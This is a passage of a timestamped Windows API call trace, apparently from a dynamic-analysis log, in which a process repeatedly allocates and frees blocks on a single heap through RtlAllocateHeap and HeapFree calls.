(HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0237.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0237.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0237.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0237.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0237.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0237.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0237.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 [0237.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d050 [0237.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0237.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0237.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d050 | out: hHeap=0x620000) returned 1 